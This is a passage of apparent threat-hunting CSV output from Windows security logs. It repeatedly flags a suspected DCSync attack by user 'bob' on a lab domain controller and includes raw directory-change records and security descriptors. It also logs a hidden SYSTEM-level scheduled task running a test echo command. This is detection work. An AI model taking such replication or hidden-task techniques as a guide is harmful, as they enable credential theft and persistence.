nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79
f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;
BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242599 + + + + + Security + DC1.insecurebank.local + + + + + 77B63738-C25C-4FBD-BA96-A7ABE17A22A3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;
CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLO
CRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242598 + + + + + Security + DC1.insecurebank.local + + + + + 77B63738-C25C-4FBD-BA96-A7ABE17A22A3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + 
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc
2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +schedule task updated,1599047269.966623,2020-09-02T15:47:49.966623+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 2171293 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x21a8c68 + \LMST + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.2" 
xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Date>2020-09-02T04:47:49.74-07:00</Date> + <Author>a-jbrown</Author> + <Description>00304d6e</Description> + <URI>\LMST</URI> + </RegistrationInfo> + <Triggers> + <TimeTrigger> + <StartBoundary>2020-02-09T04:47:48</StartBoundary> + <EndBoundary>2020-02-09T04:47:58</EndBoundary> + <Enabled>true</Enabled> + </TimeTrigger> + </Triggers> + <Principals> + <Principal id="Author"> + <RunLevel>HighestAvailable</RunLevel> + <UserId>SYSTEM</UserId> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <Duration>PT10M</Duration> + <WaitTimeout>PT1H</WaitTimeout> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="Author"> + <Exec> + <Command>cmd.exe</Command> + <Arguments>/c echo testing &gt; c:\users\public\out.txt</Arguments> + </Exec> + </Actions> +</Task> + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242597 + + + + + Security + DC1.insecurebank.local + + + + + 30F197FC-BECA-48D6-923E-A52A437119D3 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + 
DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c6
2-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242596 + + + + + Security + DC1.insecurebank.local + + + + + 30F197FC-BECA-48D6-923E-A52A437119D3 
+ - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2
